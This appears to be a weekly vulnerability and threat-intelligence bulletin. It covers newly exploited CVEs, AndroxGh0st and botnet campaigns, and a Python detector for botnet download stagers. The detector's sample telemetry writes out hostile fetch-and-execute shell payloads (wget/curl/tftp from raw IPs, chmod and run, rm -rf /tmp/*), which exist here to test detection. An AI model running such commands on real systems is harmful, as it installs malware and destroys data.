Executive Summary
This week, the CISA KEV catalog was updated with seven new CVEs, including two vulnerabilities affecting Microsoft products and another two targeting Palo Alto Networks solutions, highlighting ongoing security concerns. Fortinet cybersecurity researchers have uncovered a new phishing campaign that distributes a fileless variant of RemcosRAT, a previously known commercial malware.
The threat actors behind AndroxGh0st malware have broadened their tactics, now targeting a wider range of vulnerabilities in internet-facing applications while simultaneously deploying Mozi botnet malware. CloudSEK's recent findings highlight this expanded attack surface, showing how the malware is exploiting various security flaws for initial access, underscoring the increasing sophistication of these attacks.
The IoT_Reaper botnet continues to exploit vulnerabilities in MVPower CCTV DVRs, keeping its foothold in the evolving threat landscape. Meanwhile, Zerobot has shifted focus to a three-year-old vulnerability in the Apache HTTP server. At the same time, other well-established botnets, such as Enemybot, LiquorBot, and Mirai, are capitalizing on a nine-year-old flaw in D-Link DIR 645 routers. These attacks underscore a persistent trend: even long-known vulnerabilities remain lucrative targets for cybercriminals, highlighting the ongoing risk posed by unpatched, legacy flaws.
Trending / Critical Vulnerabilities
Current trending vulnerabilities offer insights into the latest emerging and widely discussed threats, helping defenders make informed decisions.
A critical SQL injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to access and potentially exfiltrate sensitive data from the Expedition database, including firewall credentials. This vulnerability has been actively exploited, and a proof of concept (PoC) exploit is publicly available, highlighting the urgency for remediation. Organizations using Expedition should immediately apply the security patches or mitigations provided by Palo Alto Networks to protect their systems.
A critical OS command injection vulnerability in Palo Alto Networks Expedition allows an unauthenticated attacker to execute arbitrary operating system commands with root privileges. This vulnerability has a CVSS score of 9.9, indicating its high severity, and affects specific versions of the Expedition tool. Palo Alto Networks has acknowledged reports of active exploitation and has advised users to apply the relevant patches or mitigations immediately to secure their systems.
Microsoft has addressed a high-severity elevation of privilege vulnerability in Windows Task Scheduler, assigned a CVSS score of 8.8. The flaw allows authenticated attackers to execute a specially crafted application on a vulnerable system, granting them elevated privileges to a medium integrity level. This vulnerability, now listed in the CISA Known Exploited Vulnerabilities (KEV) catalog, highlights the urgency for organizations to apply the patch to prevent potential exploitation and safeguard system security.
A Windows vulnerability involving NTLM hash disclosure through spoofing has been identified, requiring minimal user interaction, such as inspecting or interacting with a malicious file. This security flaw, now included in the CISA KEV catalog, poses significant risks to authentication systems and underscores the need for swift patch deployment.
A critical vulnerability (CVSS 9.8) in D-Link NAS devices allows unauthenticated attackers to execute arbitrary shell commands via specially crafted HTTP GET requests. This flaw is actively being exploited in the wild. Unfortunately, D-Link has confirmed that no fix will be released, as the affected devices have reached their end-of-life and are no longer supported.
A critical Local File Inclusion (LFI) vulnerability with a CVSS score of 10 has been identified in Metabase, an open-source business intelligence tool. The flaw affects the custom GeoJSON map functionality, enabling attackers to gain unauthorized access, and has been added to the CISA KEV catalog due to its severe impact.
A remote code execution vulnerability has been identified in the Questions for Confluence app, used within Atlassian's Confluence Server and Data Center products. This flaw arises from improper permissions handling, which could allow an unauthenticated attacker to execute arbitrary code on the server. Due to its severity, this vulnerability has been added to the CISA KEV catalog, emphasizing the critical need for timely remediation.
A cross-site scripting (XSS) vulnerability exists in the WebVPN login page of Cisco's Adaptive Security Appliance (ASA) software, which enables remote attackers to inject malicious web scripts or HTML code through an unspecified parameter. Although this vulnerability was discovered over a decade ago, its recent inclusion in the CISA Known Exploited Vulnerabilities (KEV) catalog highlights its ongoing relevance and the need for vigilance among users still running affected versions.
Exploit Activity and Mass Scanning Observed on Cytellite Sensors
Telemetry collected from Loginsoft sensors was analyzed and processed to derive insights into what is actively being exploited and actively being scanned. As the source of truth, source IPv4 addresses and payloads can be provided on a need-to-know basis.
Vulnerabilities abused by Botnet
This section lists vulnerabilities identified as exploited by botnets, including recent CVEs logged in MISP. It presents the top 5 CVEs whose payloads are suggestive of botnet activity, such as invoking wget against a raw IP address rather than a hostname.
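As an added example (not Loginsoft's or Cytellite's own tooling), the following Python implements the heuristic this section describes: flag sensor payloads whose download utility points at a raw IPv4 address, then rank the tagged CVEs by hit count to produce a top-N view. The sample telemetry, CVE tags and addresses are constructed; the IPs are RFC 5737 documentation addresses.

```python
"""Flag sensor payloads that look like botnet download stagers (added example)."""
import ipaddress
import re
from collections import Counter
from urllib.parse import unquote

# Download utility followed, within the same shell command, by a raw IPv4
# literal (optionally with port and path). Case-insensitive for WGET/Curl.
_STAGER_RE = re.compile(
    r"\b(?P<tool>wget|curl|tftp)\b[^;|&\n]*?"
    r"(?:https?://|\s)(?P<ip>(?:\d{1,3}\.){3}\d{1,3})(?::\d{1,5})?(?P<path>/[\w./-]*)?",
    re.IGNORECASE,
)

def normalize(payload: str) -> str:
    """Undo (possibly repeated) percent-encoding so the payload is inspected as
    the shell command it becomes on the target, not as it crossed the wire."""
    prev, cur = None, payload
    while cur != prev:
        prev, cur = cur, unquote(cur)
    return cur

def find_stager(payload: str):
    """Return (tool, ip, path) for the first download-from-raw-IP command, else None."""
    for m in _STAGER_RE.finditer(normalize(payload)):
        try:
            ipaddress.IPv4Address(m.group("ip"))  # reject 999.1.1.1-style false hits
        except ValueError:
            continue
        return m.group("tool").lower(), m.group("ip"), m.group("path") or ""
    return None

def top_botnet_cves(events, n=5):
    """Rank CVE tags by the number of payloads carrying a stager (the bulletin's top-5 view)."""
    counts = Counter(cve for cve, payload in events if find_stager(payload))
    return counts.most_common(n)

# Constructed telemetry as (cve_tag, payload as captured by the sensor).
SAMPLE_EVENTS = [
    ("CVE-2018-10562", "cd /tmp; wget http://203.0.113.10/gpon.sh; chmod +x gpon.sh; ./gpon.sh"),
    ("CVE-2018-10562", "rm -rf /tmp/*; curl -O http://203.0.113.11:8080/x86 && ./x86"),
    ("CVE-2021-41773", "GET /cgi-bin/test-cgi HTTP/1.1"),  # probe with no download stager
    ("CVE-2017-9841", "<?php system('wget%20http%3A%2F%2F198.51.100.5%2Fbot.php'); ?>"),
    ("CVE-2023-1389", "country=$(tftp 198.51.100.9 -c get mips)"),
    ("benign", "curl https://updates.example.com/manifest.json"),  # hostname, not an IP
]

if __name__ == "__main__":
    for cve, payload in SAMPLE_EVENTS:
        print(cve, find_stager(payload))
    print(top_botnet_cves(SAMPLE_EVENTS))
```

The extracted IP and path are what an analyst would pivot on (blocklist, sandbox fetch of the dropper), while the CVE ranking reproduces the top-5 table this section refers to.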
Vulnerabilities Abused by Malware
We proactively monitor the vulnerabilities that are targeted by adversaries. Each vulnerability is manually analyzed and mapped to MITRE ATT&CK tactics and techniques. The information is derived from our vulnerability intelligence platform, which collects and curates data from sources such as Twitter, Telegram, OSINT groups, blogs, data leak sites and more.
CVE-2024-43451
ClearSky’s latest research highlights a Windows NTLM hash disclosure spoofing vulnerability that has been leveraged since mid-2024, with attackers deploying the SparkRAT malware as part of this exploit. CERT-UA has attributed these activities to the Russian-based threat actor group UAC-0194, underscoring the growing risk associated with this vulnerability.
CVE-2024-4577
By exploiting a critical PHP argument injection vulnerability, the AndroxGh0st threat group has furthered its cloud-targeting strategy with the integration of the Mozi botnet. With Mozi’s decentralized communication protocol aiding in persistence, AndroxGh0st has focused its efforts on leveraging vulnerabilities to infiltrate key platforms, intensifying its ability to evade standard mitigation techniques and extend its attack footprint.
CVE-2024-36401
A critical eval injection vulnerability in GeoServer, which could lead to remote code execution, is now being exploited by the AndroxGh0st malware for initial access, privilege escalation and prolonged system control. Historically, this vulnerability has attracted exploitation from threat actors deploying the Mirai botnet and GoReverse malware, underscoring its significance in cyberattack frameworks.
CVE-2023-1389
CloudSEK's analysis reveals that a vulnerability in TP-Link Archer firmware versions prior to 1.1.4 is being actively exploited by threat actors to deploy AndroxGh0st malware. This command injection flaw in the country form makes devices susceptible to initial access attacks.
CVE-2022-1040
A severe vulnerability in Sophos Firewall’s User Portal and Webadmin components, rated at CVSS 9.8, has been identified as a key access point exploited by the AndroxGh0st malware. CloudSEK reports that this authentication bypass issue allows attackers to gain unauthorized system access and execute arbitrary commands remotely.
CVE-2022-21587
Oracle E-Business Suite has a critical vulnerability affecting versions 12.2.3 to 12.2.11, where an attacker can remotely upload malicious files via HTTP. This security flaw could enable an unauthenticated attacker to gain full control over the application. CloudSEK reports that this remote code execution vulnerability allows attackers to gain unauthorized system access.
CVE-2021-41773
A path traversal vulnerability in the Apache HTTP server allows attackers with network access to manipulate crafted URL paths to access files outside of the server’s designated document root, bypassing security controls. CloudSEK's findings indicate that this flaw can grant unauthorized system access, potentially compromising server integrity and sensitive data.
CVE-2021-26086
A remote code execution vulnerability in the Questions for Confluence app within Atlassian’s Confluence Server and Data Center products could allow unauthenticated attackers to execute arbitrary code on the server due to improper permissions handling. CloudSEK has reported that this vulnerability has been exploited by the AndroxGh0st malware to gain initial access.
CVE-2021-41277
A critical Local File Inclusion (LFI) vulnerability in Metabase, an open-source business intelligence tool, allows attackers to exploit its custom GeoJSON map functionality, potentially leading to unauthorized access to sensitive files. Rated at CVSS 10, this vulnerability has been observed by CloudSEK as a vector for initial access by the AndroxGh0st malware.
CVE-2018-15133
A remote code execution vulnerability has been identified in the Laravel Framework due to an unserialization flaw in its encryption mechanism. According to CloudSEK, this issue has been targeted by AndroxGh0st malware as an entry point for attacks.
CVE-2018-10561 and CVE-2018-10562
A critical authentication bypass and command injection vulnerability pair (CVSS 9.8) in DASAN GPON home routers could allow remote attackers to gain unauthorized access and execute arbitrary commands. According to CloudSEK, these vulnerabilities have been exploited by the AndroxGh0st malware as an initial entry point for attacks.
CVE-2017-9841
A critical remote code execution vulnerability (CVSS 9.8) in PHPUnit arises from improper input validation within the framework's PHPUnit\Util\PHP file. This flaw allows attackers to execute arbitrary code on affected systems. According to CloudSEK, AndroxGh0st malware has leveraged this vulnerability to gain initial access in targeted environments.
CVE-2017-0199
A remote code execution vulnerability in Microsoft Office and WordPad has been identified, allowing attackers to potentially take full control of affected systems. Fortinet researchers have linked this issue to a phishing campaign that delivers a fileless variant of the Remcos RAT via a malicious Excel document disguised as an order notification.
CVE-2014-2120
A cross-site scripting (XSS) vulnerability in the WebVPN login page of Cisco Adaptive Security Appliance (ASA) software enables remote attackers to inject arbitrary web scripts or HTML code through an unspecified parameter. CloudSEK has reported that the AndroxGh0st malware has exploited this vulnerability to gain initial access in targeted systems.
PRE-NVD observed for this week
PRE-NVD refers to vulnerabilities discovered and potentially exploited before their official inclusion in the National Vulnerability Database. The LOVI Platform aggregates and distributes data from open sources and social media, currently tracking over 100 security alerts, with plans to expand coverage.
External References
- https://www.cisa.gov/news-events/alerts/2024/11/12/cisa-adds-five-known-exploited-vulnerabilities-catalog
- https://thehackernews.com/2024/11/microsoft-fixes-90-new-vulnerabilities.html
- https://www.cloudsek.com/blog/mozi-resurfaces-as-androxgh0st-botnet-unraveling-the-latest-exploitation-wave
- https://netsecfish.notion.site/Command-Injection-Vulnerability-in-name-parameter-for-D-Link-NAS-12d6b683e67c80c49ffcc9214c239a07
- https://www.fortinet.com/blog/threat-research/new-campaign-uses-remcos-rat-to-exploit-victims